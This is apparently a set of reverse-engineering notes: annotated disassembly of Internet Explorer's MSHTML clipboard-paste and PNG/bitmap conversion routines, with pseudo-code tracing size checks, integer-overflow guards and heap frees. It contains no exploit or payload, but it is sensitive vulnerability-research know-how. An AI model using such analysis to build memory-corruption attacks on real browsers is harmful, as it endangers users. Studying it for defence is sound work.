+6f3819d8 85ff            test    edi,edi                                        if (h­Result<edi> >= 0)                                                              goto free_­po­Png­Image_­and_­exit
+6f3819da 7904            jns     6f3819e0                                           goto skip_­label_2                                                           
+6f3819dc                                                                        goto free_­and_­exit_­label_3                                                      
+                                                                                skip_­label_2:                                                                   
+6f3819e0 8b03            mov     eax,dword ptr [ebx]                            u­Png­Info­Size<eax> = *pu­Png­Image­Size<ebx>                                        
+6f3819e2 3b45a0          cmp     eax,dword ptr [ebp-60h]                        if (u­Png­Info­Size<eax> == u­Read­Size<stack>)                                      if (u­Png­Info­Size != u­Read­Size) {
+6f3819e5 7407            je      6f3819ee                                           goto skip_­label_3                                                           
+6f3819e7 bfffff0080      mov     edi,8000FFFFh                                  h­Result<edi> = 0x8000FFFF (Error: Catastrophic failure)                             h­Result = 0x8000FFFF (Error: Catastrophic failure)
+6f3819ec ebee            jmp     6f3819dc                                       goto free_­and_­exit_­label_3                                                          goto free_­po­Png­Image_­and_­exit
+                                                                                free_­and_­exit_­label_3:                                                          }
+6f3819dc 8bce            mov     ecx,esi                                        po­Png­Image<ecx> = po­Png­Image<esi>                                               
+6f3819de eb15            jmp     6f3819f5                                           goto free_­and_­exit_­label_1                                                  
+                                                                                                                                                                
+                                                                                skip_­label_3:                                                                   
+6f3819ee 8b459c          mov     eax,dword ptr [ebp-64h]                        ppo­Png­Image<eax> = ppo­Png­Image<stack>                                           
+6f3819f1 33c9            xor     ecx,ecx                                        po­Png­Image<ecx> = NULL                                                          
+6f3819f3 8930            mov     dword ptr [eax],esi                            *ppo­Png­Image<eax> = po­Png­Image<esi>                                             *ppo­Png­Image = po­Png­Image, po­Png­Image = NULL
+                                                                                                                                                                
+                                                                                free_­and_­exit_­label_1:                                                          free_­po­Png­Image_­and_­exit:
+6f3819f5 e881f620ff      call    6e59107b                                       MSHTML!Process­Heap­Free(po­Png­Image<ecx>)                                         Process­Heap­Free(po­Png­Image)
+exit_­label_1:                                                                                                                                                   
+6f3819fa 8d4dac          lea     ecx,[ebp-54h]                                  &po­CMem­Stm<ecx> = &(po­CMem­Stm<stack>)                                           
+6f3819fd e89f4b25ff      call    6e5d65a1                                       MSHTML!SP<Tree::Grid­Track­List>::~SP<Tree::Grid­Track­List>(                       
+                                                                                    &po­CMem­Stm<ecx>)                                                            
+6f381a02 8d4da8          lea     ecx,[ebp-58h]                                  &po­Wic­Bitmap<ecx> = &(po­Wic­Bitmap<stack>)                                       
+6f381a05 e8974b25ff      call    6e5d65a1                                       MSHTML!SP<Tree::Grid­Track­List>::~SP<Tree::Grid­Track­List>(                       
+                                                                                    &po­Wic­Bitmap<ecx>)                                                          
+6f381a0a 8b4dfc          mov     ecx,dword ptr [ebp-4]                                                                                                          
+6f381a0d 8bc7            mov     eax,edi                                        return h­Result<edi>                                                             
+6f381a0f 5f              pop     edi                                                                                                                            
+6f381a10 5e              pop     esi                                                                                                                            
+6f381a11 33cd            xor     ecx,ebp                                                                                                                        
+6f381a13 5b              pop     ebx                                                                                                                            
+6f381a14 e8f7f520ff      call    MSHTML!__security_­check_­cookie (6e591010)                                                                                      
+6f381a19 8be5            mov     esp,ebp                                                                                                                        
+6f381a1b 5d              pop     ebp                                                                                                                            
+6f381a1c c21000          ret     10h                                                                                                                            
+6f381a1f 90              nop                                                                                                                                    
+6f381a20 90              nop                                                                                                                                    
+6f381a21 90              nop                                                                                                                                    
+6f381a22 90              nop                                                                                                                                    
+6f381a23 90              nop                                                                                                                                    
+                                                                                                                                                                
+MSHTML!CPaste­Command..Paste­From­Clipboard.txt
+MSHTML!CPaste­Command::Paste­From­Clipboard(
+    self<ecx>,
+    x­Arg1<ebp+8>,
+    x­Arg2<ebp+C>,
+    x­Arg3<ebp+10>,
+    x­Arg4<ebp+14>,
+    x­Arg5<ebp+18>,
+    x­Arg6<ebp+1C>,
+    x­Arg7<ebp+20>,
+    x­Arg8<ebp+24>):
+esp+34 = VOID* var34 (po­Bitmap)
+esp+38 = BYTE[]* var38 (pab­Image­Data)
+esp+4C = UINT var4C (u­Bitmap­Size)
+esp+50 = UINT var50 (u­Bitmap­Info­Size / u­Png­Image­Size)
+
+MSHTML!CPaste­Command::Paste­From­Clipboard:
+
+72cf6235 8bff            mov     edi,edi
+72cf6237 55              push    ebp
+72cf6238 8bec            mov     ebp,esp
+72cf623a 83e4f8          and     esp,0FFFFFFF8h
+72cf623d 83ec74          sub     esp,74h
+72cf6240 53              push    ebx
+72cf6241 56              push    esi
+72cf6242 57              push    edi
+72cf6243 8bd9            mov     ebx,ecx
+72cf6245 e8b1cdfdff      call    MSHTML!CCommand::Doc (72cd2ffb)
+72cf624a 50              push    eax
+72cf624b 8d4c2478        lea     ecx,[esp+78h]
+72cf624f e86fb1afff      call    MSHTML!CPaste­Operation­State::CPaste­Operation­State (727f13c3)
+72cf6254 33ff            xor     edi,edi
+72cf6256 8bcb            mov     ecx,ebx
+72cf6258 897c243c        mov     dword ptr [esp+3Ch],edi
+72cf625c 897c2410        mov     dword ptr [esp+10h],edi
+72cf6260 897c2430        mov     dword ptr [esp+30h],edi
+72cf6264 897c2468        mov     dword ptr [esp+68h],edi
+72cf6268 897c246c        mov     dword ptr [esp+6Ch],edi
+72cf626c 897c2470        mov     dword ptr [esp+70h],edi
+72cf6270 897c2414        mov     dword ptr [esp+14h],edi
+72cf6274 897c2424        mov     dword ptr [esp+24h],edi
+72cf6278 e87ecdfdff      call    MSHTML!CCommand::Doc (72cd2ffb)
+72cf627d 8b4b08          mov     ecx,dword ptr [ebx+8]
+72cf6280 8bf0            mov     esi,eax
+72cf6282 83c110          add     ecx,10h
+72cf6285 897c2428        mov     dword ptr [esp+28h],edi
+72cf6289 897c242c        mov     dword ptr [esp+2Ch],edi
+72cf628d 897c2440        mov     dword ptr [esp+40h],edi
+72cf6291 6a01            push    1
+72cf6293 8b01            mov     eax,dword ptr [ecx]
+72cf6295 89742454        mov     dword ptr [esp+54h],esi
+72cf6299 897c241c        mov     dword ptr [esp+1Ch],edi
+72cf629d 897c2420        mov     dword ptr [esp+20h],edi
+72cf62a1 ff503c          call    dword ptr [eax+3Ch]
+72cf62a4 56              push    esi
+72cf62a5 8d4c2460        lea     ecx,[esp+60h]
+72cf62a9 8944245c        mov     dword ptr [esp+5Ch],eax
+72cf62ad 897c2464        mov     dword ptr [esp+64h],edi
+72cf62b1 e8899265ff      call    MSHTML!CEnable­Deferring­Accessibility­Events::CEnable­Deferring­Accessibility­Events (7234f53f)
+72cf62b6 8b7d08          mov     edi,dword ptr [ebp+8]
+72cf62b9 8bcf            mov     ecx,edi
+72cf62bb 8b07            mov     eax,dword ptr [edi]
+72cf62bd ff9080000000    call    dword ptr [eax+80h]
+72cf62c3 85c0            test    eax,eax
+72cf62c5 0f84fd050000    je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x693 (72cf68c8)
+72cf62cb 8b4d0c          mov     ecx,dword ptr [ebp+0Ch]
+72cf62ce 8b01            mov     eax,dword ptr [ecx]
+72cf62d0 ff9080000000    call    dword ptr [eax+80h]
+72cf62d6 85c0            test    eax,eax
+72cf62d8 0f84ea050000    je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x693 (72cf68c8)
+72cf62de 837d2000        cmp     dword ptr [ebp+20h],0
+72cf62e2 741c            je      MSHTML!CPaste­Command::Paste­From­Clipboard+0xcb (72cf6300)
+72cf62e4 8bcb            mov     ecx,ebx
+72cf62e6 e810cdfdff      call    MSHTML!CCommand::Doc (72cd2ffb)
+72cf62eb 8bf0            mov     esi,eax
+72cf62ed 8bcf            mov     ecx,edi
+72cf62ef 8b07            mov     eax,dword ptr [edi]
+72cf62f1 ff5078          call    dword ptr [eax+78h]
+72cf62f4 50              push    eax
+72cf62f5 8d8e7c010000    lea     ecx,[esi+17Ch]
+72cf62fb e8bd2967ff      call    MSHTML!TSmart­Pointer<CMarkup>::operator= (72368cbd)
+72cf6300 8b4b08          mov     ecx,dword ptr [ebx+8]
+72cf6303 8d542418        lea     edx,[esp+18h]
+72cf6307 8d4910          lea     ecx,[ecx+10h]
+72cf630a e8ea7062ff      call    MSHTML!Create­Markup­Pointer2 (7231d3f9)
+72cf630f 8bf0            mov     esi,eax
+72cf6311 85f6            test    esi,esi
+72cf6313 0f88b4050000    js      MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf6319 8b4c2418        mov     ecx,dword ptr [esp+18h]
+72cf631d 57              push    edi
+72cf631e 51              push    ecx
+72cf631f 8b01            mov     eax,dword ptr [ecx]
+72cf6321 ff5030          call    dword ptr [eax+30h]
+72cf6324 8bf0            mov     esi,eax
+72cf6326 85f6            test    esi,esi
+72cf6328 0f889f050000    js      MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf632e 8b4c2418        mov     ecx,dword ptr [esp+18h]
+72cf6332 6a00            push    0
+72cf6334 51              push    ecx
+72cf6335 8b01            mov     eax,dword ptr [ecx]
+72cf6337 ff5014          call    dword ptr [eax+14h]
+72cf633a 8bf0            mov     esi,eax
+72cf633c 85f6            test    esi,esi
+72cf633e 0f8889050000    js      MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf6344 8b4b08          mov     ecx,dword ptr [ebx+8]
+72cf6347 8d54241c        lea     edx,[esp+1Ch]
+72cf634b 8d4910          lea     ecx,[ecx+10h]
+72cf634e e8a67062ff      call    MSHTML!Create­Markup­Pointer2 (7231d3f9)
+72cf6353 8bf0            mov     esi,eax
+72cf6355 85f6            test    esi,esi
+72cf6357 0f8870050000    js      MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf635d 8b4c241c        mov     ecx,dword ptr [esp+1Ch]
+72cf6361 57              push    edi
+72cf6362 51              push    ecx
+72cf6363 8b01            mov     eax,dword ptr [ecx]
+72cf6365 ff5030          call    dword ptr [eax+30h]
+72cf6368 8bf0            mov     esi,eax
+72cf636a 85f6            test    esi,esi
+72cf636c 0f885b050000    js      MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf6372 8b4c241c        mov     ecx,dword ptr [esp+1Ch]
+72cf6376 6a01            push    1
+72cf6378 51              push    ecx
+72cf6379 8b01            mov     eax,dword ptr [ecx]
+72cf637b ff5014          call    dword ptr [eax+14h]
+72cf637e 8bf0            mov     esi,eax
+72cf6380 85f6            test    esi,esi
+72cf6382 0f8845050000    js      MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf6388 8b03            mov     eax,dword ptr [ebx]
+72cf638a 8d4c2448        lea     ecx,[esp+48h]
+72cf638e 51              push    ecx
+72cf638f 8d4c2458        lea     ecx,[esp+58h]
+72cf6393 51              push    ecx
+72cf6394 8d4c241c        lea     ecx,[esp+1Ch]
+72cf6398 51              push    ecx
+72cf6399 8bcb            mov     ecx,ebx
+72cf639b ff5030          call    dword ptr [eax+30h]
+72cf639e 8bf0            mov     esi,eax
+72cf63a0 85f6            test    esi,esi
+72cf63a2 0f8825050000    js      MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf63a8 8b442450        mov     eax,dword ptr [esp+50h]
+72cf63ac 85c0            test    eax,eax
+72cf63ae 741e            je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x199 (72cf63ce)
+72cf63b0 6afe            push    0FFFFFFFEh
+72cf63b2 59              pop     ecx
+72cf63b3 663b88840e0000  cmp     cx,word ptr [eax+0E84h]
+72cf63ba 7512            jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x199 (72cf63ce)
+72cf63bc 66894c2464      mov     word ptr [esp+64h],cx
+72cf63c1 33c9            xor     ecx,ecx
+72cf63c3 89442460        mov     dword ptr [esp+60h],eax
+72cf63c7 668988840e0000  mov     word ptr [eax+0E84h],cx
+72cf63ce 837d1000        cmp     dword ptr [ebp+10h],0
+72cf63d2 7558            jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x1f7 (72cf642c)
+72cf63d4 8d44243c        lea     eax,[esp+3Ch]
+72cf63d8 50              push    eax
+72cf63d9 ff15b8c1d972    call    dword ptr [MSHTML!_imp__­Ole­Get­Clipboard (72d9c1b8)]
+72cf63df 8bf0            mov     esi,eax
+72cf63e1 85f6            test    esi,esi
+72cf63e3 0f85e4040000    jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf63e9 8d44242c        lea     eax,[esp+2Ch]
+72cf63ed 50              push    eax
+72cf63ee b8c0bfff71      mov     eax,offset MSHTML!IID_­IDoc­Host­UIHandler (71ffbfc0)
+72cf63f3 50              push    eax
+72cf63f4 50              push    eax
+72cf63f5 8b4308          mov     eax,dword ptr [ebx+8]
+72cf63f8 ff7018          push    dword ptr [eax+18h]
+72cf63fb e854465dff      call    MSHTML!CDocument::Query­Service (722caa54)
+72cf6400 8b4c242c        mov     ecx,dword ptr [esp+2Ch]
+72cf6404 8b54243c        mov     edx,dword ptr [esp+3Ch]
+72cf6408 895510          mov     dword ptr [ebp+10h],edx
+72cf640b 85c9            test    ecx,ecx
+72cf640d 741d            je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x1f7 (72cf642c)
+72cf640f 8b01            mov     eax,dword ptr [ecx]
+72cf6411 8d742428        lea     esi,[esp+28h]
+72cf6415 56              push    esi
+72cf6416 52              push    edx
+72cf6417 51              push    ecx
+72cf6418 ff5044          call    dword ptr [eax+44h]
+72cf641b 85c0            test    eax,eax
+72cf641d 750d            jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x1f7 (72cf642c)
+72cf641f 39442428        cmp     dword ptr [esp+28h],eax
+72cf6423 7407            je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x1f7 (72cf642c)
+72cf6425 8b442428        mov     eax,dword ptr [esp+28h]
+72cf6429 894510          mov     dword ptr [ebp+10h],eax
+72cf642c 8b4b08          mov     ecx,dword ptr [ebx+8]
+72cf642f 8d442424        lea     eax,[esp+24h]
+72cf6433 50              push    eax
+72cf6434 57              push    edi
+72cf6435 e886255aff      call    MSHTML!CHTMLEditor::Get­Flow­Element (722989c0)
+72cf643a 8bf0            mov     esi,eax
+72cf643c 85f6            test    esi,esi
+72cf643e 0f8889040000    js      MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf6444 8b442424        mov     eax,dword ptr [esp+24h]
+72cf6448 85c0            test    eax,eax
+72cf644a 750a            jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x221 (72cf6456)
+72cf644c c744244401000000 mov     dword ptr [esp+44h],1
+72cf6454 eb3a            jmp     MSHTML!CPaste­Command::Paste­From­Clipboard+0x25b (72cf6490)
+72cf6456 8b30            mov     esi,dword ptr [eax]
+72cf6458 8d4c2440        lea     ecx,[esp+40h]
+72cf645c e82e5462ff      call    MSHTML!CSmart­Ptr<IHTMLElement3>::operator& (7231b88f)
+72cf6461 50              push    eax
+72cf6462 6854e82172      push    offset MSHTML!IID_­IHTMLElement3 (7221e854)
+72cf6467 ff74242c        push    dword ptr [esp+2Ch]
+72cf646b ff16            call    dword ptr [esi]
+72cf646d 8bf0            mov     esi,eax
+72cf646f 85f6            test    esi,esi
+72cf6471 0f8856040000    js      MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf6477 8b442440        mov     eax,dword ptr [esp+40h]
+72cf647b 8d542444        lea     edx,[esp+44h]
+72cf647f 52              push    edx
+72cf6480 50              push    eax
+72cf6481 8b08            mov     ecx,dword ptr [eax]
+72cf6483 ff5124          call    dword ptr [ecx+24h]
+72cf6486 8bf0            mov     esi,eax
+72cf6488 85f6            test    esi,esi
+72cf648a 0f883d040000    js      MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf6490 8b7c2454        mov     edi,dword ptr [esp+54h]
+72cf6494 6bc714          imul    eax,edi,14h
+72cf6497 01442414        add     dword ptr [esp+14h],eax
+72cf649b e9cc010000      jmp     MSHTML!CPaste­Command::Paste­From­Clipboard+0x437 (72cf666c)
+72cf64a0 66837c244400    cmp     word ptr [esp+44h],0
+72cf64a6 750e            jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x281 (72cf64b6)
+72cf64a8 83ff03          cmp     edi,3
+72cf64ab 7409            je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x281 (72cf64b6)
+72cf64ad 83ff02          cmp     edi,2
+72cf64b0 0f85b0010000    jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x431 (72cf6666)
+72cf64b6 8b4d10          mov     ecx,dword ptr [ebp+10h]
+72cf64b9 ff742414        push    dword ptr [esp+14h]
+72cf64bd 51              push    ecx
+72cf64be 8b01            mov     eax,dword ptr [ecx]
+72cf64c0 ff5014          call    dword ptr [eax+14h]
+72cf64c3 85c0            test    eax,eax
+72cf64c5 0f859b010000    jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x431 (72cf6666)
+72cf64cb 83ff04          cmp     edi,4
+72cf64ce 7418            je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x2b3 (72cf64e8)
+72cf64d0 83ff01          cmp     edi,1
+72cf64d3 7413            je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x2b3 (72cf64e8)
+72cf64d5 83ff03          cmp     edi,3
+72cf64d8 740e            je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x2b3 (72cf64e8)
+72cf64da 83ff02          cmp     edi,2
+72cf64dd 7409            je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x2b3 (72cf64e8)
+72cf64df 85ff            test    edi,edi
+72cf64e1 7405            je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x2b3 (72cf64e8)
+72cf64e3 83ff08          cmp     edi,8
+72cf64e6 7524            jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x2d7 (72cf650c)
+72cf64e8 8b4d10          mov     ecx,dword ptr [ebp+10h]
+72cf64eb 8d542468        lea     edx,[esp+68h]
+72cf64ef 52              push    edx
+72cf64f0 ff742418        push    dword ptr [esp+18h]
+72cf64f4 8b01            mov     eax,dword ptr [ecx]
+72cf64f6 51              push    ecx
+72cf64f7 ff500c          call    dword ptr [eax+0Ch]
+72cf64fa 85c0            test    eax,eax
+72cf64fc 0f8564010000    jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x431 (72cf6666)
+72cf6502 8b44246c        mov     eax,dword ptr [esp+6Ch]
+72cf6506 89442410        mov     dword ptr [esp+10h],eax
+72cf650a eb04            jmp     MSHTML!CPaste­Command::Paste­From­Clipboard+0x2db (72cf6510)
+72cf650c 8b442410        mov     eax,dword ptr [esp+10h]
+72cf6510 85ff            test    edi,edi
+72cf6512 0f84f8000000    je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x3db (72cf6610)
+72cf6518 83ff01          cmp     edi,1
+72cf651b 744d            je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x335 (72cf656a)
+72cf651d 83ff02          cmp     edi,2
+72cf6520 0f84d1020000    je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x5c2 (72cf67f7)
+72cf6526 0f8e3a010000    jle     MSHTML!CPaste­Command::Paste­From­Clipboard+0x431 (72cf6666)
+72cf652c 83ff04          cmp     edi,4
+72cf652f 0f8e0d020000    jle     MSHTML!CPaste­Command::Paste­From­Clipboard+0x50d (72cf6742)
+72cf6535 83ff08          cmp     edi,8
+72cf6538 0f8528010000    jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x431 (72cf6666)
+72cf653e 50              push    eax
+72cf653f ff15e043dc72    call    dword ptr [MSHTML!_imp__­Global­Lock (72dc43e0)]
+72cf6545 8bf8            mov     edi,eax
+72cf6547 8b442410        mov     eax,dword ptr [esp+10h]
+72cf654b 89442420        mov     dword ptr [esp+20h],eax
+72cf654f 85ff            test    edi,edi
+72cf6551 0f8524010000    jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x446 (72cf667b)
+72cf6557 be0e000780      mov     esi,8007000Eh
+72cf655c 8d4c2420        lea     ecx,[esp+20h]
+72cf6560 e819f1bfff      call    MSHTML!TSmart­Handle<void *,&Global­Unlock>::~TSmart­Handle<void *,&Global­Unlock> (728f567e)
+72cf6565 e963030000      jmp     MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf656a 8b4c242c        mov     ecx,dword ptr [esp+2Ch]
+72cf656e e87b8f0200      call    MSHTML!Ed­Util::Is­Rtf­Converter­Enabled (72d1f4ee)
+72cf6573 85c0            test    eax,eax
+72cf6575 0f84eb000000    je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x431 (72cf6666)
+72cf657b ff742410        push    dword ptr [esp+10h]
+72cf657f ff15e043dc72    call    dword ptr [MSHTML!_imp__­Global­Lock (72dc43e0)]
+72cf6585 85c0            test    eax,eax
+72cf6587 0f84ff010000    je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x557 (72cf678c)
+72cf658d 8d4c2420        lea     ecx,[esp+20h]
+72cf6591 8bd0            mov     edx,eax
+72cf6593 51              push    ecx
+72cf6594 e8a598fdff      call    MSHTML!CRtf­To­Html­Converter::String­Rtf­To­String­Html (72ccfe3e)
+72cf6599 ff742410        push    dword ptr [esp+10h]
+72cf659d 8bf0            mov     esi,eax
+72cf659f ff15dc43dc72    call    dword ptr [MSHTML!_imp__­Global­Unlock (72dc43dc)]
+72cf65a5 85f6            test    esi,esi
+72cf65a7 0f85b4000000    jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x42c (72cf6661)
+72cf65ad 397518          cmp     dword ptr [ebp+18h],esi
+72cf65b0 7436            je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x3b3 (72cf65e8)
+72cf65b2 397520          cmp     dword ptr [ebp+20h],esi
+72cf65b5 741d            je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x39f (72cf65d4)
+72cf65b7 ff7524          push    dword ptr [ebp+24h]
+72cf65ba 8bcb            mov     ecx,ebx
+72cf65bc ff751c          push    dword ptr [ebp+1Ch]
+72cf65bf ff750c          push    dword ptr [ebp+0Ch]
+72cf65c2 ff7508          push    dword ptr [ebp+8]
+72cf65c5 e802bbffff      call    MSHTML!CPaste­Command::Fire­Paste­Event­And­Remove­Selection (72cf20cc)
+72cf65ca 8bf0            mov     esi,eax
+72cf65cc 85f6            test    esi,esi
+72cf65ce 0f85f9020000    jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf65d4 ff742420        push    dword ptr [esp+20h]
+72cf65d8 8b4b08          mov     ecx,dword ptr [ebx+8]
+72cf65db ff750c          push    dword ptr [ebp+0Ch]
+72cf65de ff7508          push    dword ptr [ebp+8]
+72cf65e1 e89158fdff      call    MSHTML!CHTMLEditor::Do­The­Darn­IE50Paste­HTML (72ccbe77)
+72cf65e6 eb1a            jmp     MSHTML!CPaste­Command::Paste­From­Clipboard+0x3cd (72cf6602)
+72cf65e8 ff7524          push    dword ptr [ebp+24h]
+72cf65eb 8bcb            mov     ecx,ebx
+72cf65ed ff751c          push    dword ptr [ebp+1Ch]
+72cf65f0 ff7520          push    dword ptr [ebp+20h]
+72cf65f3 ff74242c        push    dword ptr [esp+2Ch]
+72cf65f7 ff750c          push    dword ptr [ebp+0Ch]
+72cf65fa ff7508          push    dword ptr [ebp+8]
+72cf65fd e861e4ffff      call    MSHTML!CPaste­Command::Handle­UIPaste­HTML (72cf4a63)
+72cf6602 ff742420        push    dword ptr [esp+20h]
+72cf6606 8bf0            mov     esi,eax
+72cf6608 ff15f044dc72    call    dword ptr [MSHTML!_imp__­Global­Free (72dc44f0)]
+72cf660e eb23            jmp     MSHTML!CPaste­Command::Paste­From­Clipboard+0x3fe (72cf6633)
+72cf6610 837d1800        cmp     dword ptr [ebp+18h],0
+72cf6614 0f8578020000    jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x65d (72cf6892)
+72cf661a ff7524          push    dword ptr [ebp+24h]
+72cf661d 8bcb            mov     ecx,ebx
+72cf661f ff751c          push    dword ptr [ebp+1Ch]
+72cf6622 ff7520          push    dword ptr [ebp+20h]
+72cf6625 50              push    eax
+72cf6626 ff750c          push    dword ptr [ebp+0Ch]
+72cf6629 ff7508          push    dword ptr [ebp+8]
+72cf662c e832e4ffff      call    MSHTML!CPaste­Command::Handle­UIPaste­HTML (72cf4a63)
+72cf6631 8bf0            mov     esi,eax
+72cf6633 85f6            test    esi,esi
+72cf6635 0f8992020000    jns     MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf663b 8b4d08          mov     ecx,dword ptr [ebp+8]
+72cf663e 8b01            mov     eax,dword ptr [ecx]
+72cf6640 ff9080000000    call    dword ptr [eax+80h]
+72cf6646 85c0            test    eax,eax
+72cf6648 0f847f020000    je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf664e 8b4d0c          mov     ecx,dword ptr [ebp+0Ch]
+72cf6651 8b01            mov     eax,dword ptr [ecx]
+72cf6653 ff9080000000    call    dword ptr [eax+80h]
+72cf6659 85c0            test    eax,eax
+72cf665b 0f846c020000    je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf6661 be64000480      mov     esi,80040064h
+72cf6666 47              inc     edi
+72cf6667 8344241414      add     dword ptr [esp+14h],14h
+72cf666c 3b7c2448        cmp     edi,dword ptr [esp+48h]
+72cf6670 0f8d57020000    jge     MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (72cf68cd)
+72cf6676 e925feffff      jmp     MSHTML!CPaste­Command::Paste­From­Clipboard+0x26b (72cf64a0)
+
+7202667b 50              push    eax                                            
+7202667c ff15e4430f72    call    dword ptr [MSHTML!_imp__­Global­Size (720f43e4)] <eax> = 
+72026682 89442450        mov     dword ptr [esp+50h],eax                        u­Bitmap­Info­Size<stack> = u­Bitmap­Info­Size<eax>
+72026686 83f82c          cmp     eax,2Ch                                        if (u­Bitmap­Info­Size<eax> < 0x2C)
+72026689 0f82cdfeffff    jb      7202655c                                           goto label1
+7202668f 8b17            mov     edx,dword ptr [edi]                            larg2<edx> = po­Bitmap­Info<edi>->BITMAPINFOHEADER.bi­Size
+72026691 8d442438        lea     eax,[esp+38h]                                  &u­Actual­Bitmap­Info­Size<eax> = &(u­Actual­Bitmap­Info­Size<stack>)
+72026695 8b4f14          mov     ecx,dword ptr [edi+14h]                        larg1<ecx> = po­Bitmap­Info<edi>->BITMAPINFOHEADER.bi­Size­Image
+72026698 8364243800      and     dword ptr [esp+38h],0                          u­Actual­Bitmap­Info­Size<stack> = 0
+7202669d 50              push    eax                                            larg3<stack> = &pab­Image­Data<eax>
+7202669e e8f9da28ff      call    712b419c                                       h­Result<eax> = MSHTML!UInt­Add(                                                  u­Actual­Bitmap­Info­Size = po­Bitmap­Info->bi­Size­Image + po­Bitmap­Info->bi­Size
+                                                                                    po­Bitmap­Info<edi>->bi­Size­Image<ecx>                                         h­Result<eax> = error code on integer overflow
+                                                                                    po­Bitmap­Info<edi>->bi­Size<edx>
+                                                                                    &u­Actual­Bitmap­Info­Size<eax>
+                                                                                    );
+720266a3 8bf0            mov     esi,eax                                        h­Result<esi> = h­Result<eax>
+720266a5 85f6            test    esi,esi                                        if (h­Result<esi> < 0)
+720266a7 0f88affeffff    js      7202655c                                           goto label1
+720266ad 8b442450        mov     eax,dword ptr [esp+50h]                        u­Bitmap­Info­Size<eax> = u­Bitmap­Info­Size<stack>
+720266b1 3b442438        cmp     eax,dword ptr [esp+38h]                        if (u­Bitmap­Info­Size<eax> < u­Actual­Bitmap­Info­Size<stack>)
+720266b5 0f82a1feffff    jb      7202655c                                           goto label1
+720266bb 8364243400      and     dword ptr [esp+34h],0                          po­Original­Bitmap<stack> = 0
+720266c0 8d4c244c        lea     ecx,[esp+4Ch]                                  &u­Bitmap­Size<ecx> = &(u­Bitmap­Size<stack>)
+720266c4 8364244c00      and     dword ptr [esp+4Ch],0                          u­Bitmap­Size<stack> = 0
+720266c9 51              push    ecx                                            larg4<stack> = &u­Bitmap­Size<ecx>
+720266ca 8d4c2438        lea     ecx,[esp+38h]                                  &po­Bitmap<ecx> = &(po­Bitmap<stack>)
+720266ce 51              push    ecx                                            larg3<stack> = &po­Bitmap<ecx>
+720266cf 50              push    eax                                            larg2<stack> = u­Bitmap­Info­Size<eax>
+720266d0 57              push    edi                                            larg1<stack> = po­Bitmap­Info<edi>
+720266d1 e8af020000      call    72026985                                       h­Result<eax> = MSHTML!CPaste­Command::Prepend­Bitmap­Header(
+                                                                                    po­Bitmap­Info = po­Bitmap­Info<edi>
+                                                                                    u­Bitmap­Info­Size = u­Bitmap­Info­Size<eax>
+                                                                                    ppo­Bitmap = &po­Bitmap,
+                                                                                    pu­Bitmap­Size = &u­Bitmap­Size);
+720266d6 8bf0            mov     esi,eax                                        h­Result<esi> = h­Result<eax>
+720266d8 85f6            test    esi,esi                                        if (h­Result<esi> != 0)
+720266da 0f857cfeffff    jne     7202655c                                           goto label1
+720266e0 21442438        and     dword ptr [esp+38h],eax                        pab­Image­Data<stack> = NULL<eax>
+720266e4 21442450        and     dword ptr [esp+50h],eax                        u­Png­Image­Size<stack> = 0<eax>
+720266e8 8d442450        lea     eax,[esp+50h]                                  &u­Png­Image­Size<eax> = &(u­Png­Image­Size<stack>)
+720266ec 50              push    eax                                            larg4<stack> = &u­Png­Image­Size<eax>
+720266ed 8d44243c        lea     eax,[esp+3Ch]                                  &pab­Image­Data<eax> = &(pab­Image­Data<stack>)
+720266f1 50              push    eax                                            larg3<stack> = &pab­Image­Data<eax>
+720266f2 ff742454        push    dword ptr [esp+54h]                            larg2<stack> = u­Bitmap­Size<stack>
